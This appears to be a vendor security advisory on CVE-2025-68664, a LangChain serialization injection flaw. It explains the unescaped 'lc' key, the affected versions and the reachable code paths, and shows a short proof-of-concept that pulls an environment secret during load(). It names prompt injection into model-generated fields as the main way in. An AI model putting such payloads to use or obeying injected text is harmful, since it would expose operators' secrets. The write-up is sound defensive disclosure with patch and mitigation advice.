Executive Summary

CVE-2025-68664 is a critical serialization injection vulnerability in LangChain that affects how data is serialized using dumps() and dumpd(), and later reconstructed using load() and loads().

The issue stems from a failure to properly escape user-controlled dictionaries that contain the reserved lc key. Because this key is used internally by LangChain to represent serialized objects, unescaped user data may later be interpreted as a valid LangChain object during deserialization.

When this happens, attacker-controlled data can be treated as executable object metadata rather than plain values. In vulnerable configurations, this can lead to secret extraction from environment variables or instantiation of internal classes with attacker-defined parameters.

What Is LangChain?

LangChain is a widely used framework for building LLM-powered applications. It provides abstractions for:

  • Streaming model outputs
  • Managing execution graphs and chains
  • Persisting message history
  • Caching generations and intermediate results
  • Moving structured data between tools, agents, and retrievers

To support these workflows, LangChain relies heavily on serialization. Data is frequently converted into a structured form, stored or transmitted, and later reconstructed using the framework’s deserialization APIs.

Affected Versions

The vulnerability affects multiple release tracks of LangChain Core.

Vulnerable versions:

  • langchain-core >= 1.0.0 and < 1.2.5
  • langchain-core < 0.3.81

Patched versions:

  • langchain-core 1.2.5
  • langchain-core 0.3.81

Applications running affected versions should assume the vulnerable serialization behavior is present unless explicitly mitigated.

Root Cause: Unescaped lc Keys During Serialization

LangChain’s serialization format reserves the lc key to indicate internal serialized objects.

The vulnerability arises because dumps() and dumpd() did not escape dictionaries containing an lc key, These dictionaries could originate from user-controlled or LLM-generated data. The resulting serialized output retained the lc structure unmodified

When that output was later passed into load() or loads(), the deserializer treated the injected structure as a legitimate LangChain object instead of ordinary user data.

In effect, data that should have remained inert was reinterpreted as an instruction.

How load() and loads() Interpret the Injected Data

The deserialization APIs (load() and loads()) reconstruct objects based on serialized manifests.

If an attacker-controlled payload includes a structure like:

{
  "lc": 1,
  "type": "secret",
  "id": ["API_KEY"]
}

Copied

then, in vulnerable versions:

  • The structure is parsed as a serialized LangChain object
  • Environment variables may be accessed during reconstruction
  • The resulting value is returned as part of the application’s data

Earlier versions further amplified the risk by defaulting to secrets_from_env=True, allowing environment variables to be read automatically during deserialization.

Reachable Attack Surface

This vulnerability is not limited to cases where applications explicitly deserialize untrusted external input.
In many LangChain workflows, serialization and deserialization are performed internally as part of normal framework behavior.

The vulnerable dumps()load() flow is reachable through several commonly used features:

  • astream_events(version="v1"): The v1 streaming implementation serializes event payloads using the affected serialization logic.
  • Runnable.astream_log(): Streaming logs rely on internal serialization of execution state that may include LLM-controlled fields.
  • Message history handling via RunnableWithMessageHistory: Conversation state is serialized and later reconstructed, potentially reloading attacker-influenced data.
  • Reloading cached generations: Cached LLM outputs may be deserialized at a later stage, reprocessing data that originated from model responses.
  • InMemoryVectorStore.load() on untrusted documents: Loading vector stores reconstructs serialized documents that may contain attacker-controlled metadata.
  • Loading artifacts from the LangChain Hub using hub.pull: Pulled manifests are deserialized locally and may include injected structures if the source is not trusted.
  • Byte-store–backed retrievers and document stores:  Byte stores persist serialized representations that are later reloaded during retrieval operations.
  • LangSmith run loaders processing untrusted messages: Run data containing LLM-generated content may be deserialized as part of analysis or replay workflows.

In many of these cases, developers do not directly call load() or loads(), making it easy to overlook that untrusted data is being deserialized at all.

Most Common Injection Vector

The most common entry point for attacker-controlled data is through LLM-generated fields, such as:

  • additional_kwargs
  • response_metadata
  • Tool outputs
  • Prompt-influenced structured responses

Because these fields can be influenced through prompt injection, an attacker may be able to introduce a malicious lc structure without direct access to application code or APIs.

Impact

If an attacker can influence data that is serialized with dumps() or dumpd() and later processed by load() or loads(), they may be able to:

  • Extract secrets from environment variables
  • Instantiate internal LangChain classes with controlled parameters
  • Trigger side effects during object initialization, such as:
    • Network requests
    • File operations
    • Resource access

The scope is limited to classes within trusted LangChain namespaces, but the impact depends heavily on which classes are available and how they behave during initialization.

Example Exploit Flow

from langchain_core.load import dumps, load
import os

attacker_dict = {
    "attacker_data": {
        "lc": 1,
        "type": "secret",
        "id": ["API_KEY"]
    }
}

serialized = dumps(attacker_dict)  # 'lc' key is not escaped

os.environ["API_KEY"] = "key-123"
deserialized = load(serialized, secrets_from_env=True)

print(deserialized["attacker_data"])

Copied

Output:

key-123

Copied

The secret is extracted during deserialization, without direct access to the environment or configuration.

Security Hardening in the Patch

The patched releases address both the immediate bug and the broader risk.

Changes include:

  • Proper escaping of lc keys during dumps() and dumpd()
  • A new allowed_objects mechanism with a restricted default ("core")
  • secrets_from_env default changed from True to False
  • Blocking of Jinja2 template initialization by default via init_validator

Some of these changes are breaking by design, as they tighten previously permissive behavior.

How to Mitigate This Issue

Applying the patched LangChain release is the baseline fix. The update corrects how dumps() and dumpd() handle reserved keys and tightens how load() and loads() reconstruct objects. In many deployments, upgrading alone resolves the issue.

Additional precautions depend on how your application uses serialization:

  • Stick with restrictive deserialization defaults
    If your application only reconstructs built-in LangChain types such as messages or documents, the default deserialization behavior should remain sufficient and requires no extra configuration.
result = load(serialized_payload)

Copied

  • Limit which custom objects can be reconstructed
    When deserializing application-specific objects, explicitly declare which classes are expected. Avoid broad or implicit object reconstruction.
result = load(serialized_payload, allowed_objects=[MyAppObject])

Copied

  • Keep secret resolution turned off unless necessary
    Resolving environment variables during deserialization should not be enabled by default. Only opt in when the serialized data source is fully trusted and cannot be influenced by user or model input.
result = load(serialized_payload, secrets_from_env=True)

Copied

  • Do not bypass initialization checks unless required
    Template-based initialization is blocked by default due to its ability to execute code. Re-enabling it should be limited to tightly controlled scenarios.
result = load(
    serialized_payload,
    allowed_objects=[SafeTemplate],
    init_validator=None
)

Copied

Serialization is not just a data format concern in LLM-based systems. When serialized state can be influenced by model output, deserialization behavior becomes part of the security model and should be handled accordingly.

How Upwind Helps Mitigate This Risk

Addressing CVE-2025-68664 starts with upgrading LangChain, but the real risk depends on how affected services behave at runtime. Vulnerabilities in serialization become critical when LLM-driven workloads have access to secrets, filesystems, or external networks.

Upwind helps teams understand that runtime context by identifying where vulnerable LangChain services are running, what sensitive resources they can access, and how far an attacker could move if one of those services is compromised. By mapping real execution paths rather than relying only on configuration or dependency data, Upwind helps security teams assess the actual blast radius of serialization issues like this and prioritize mitigation accordingly.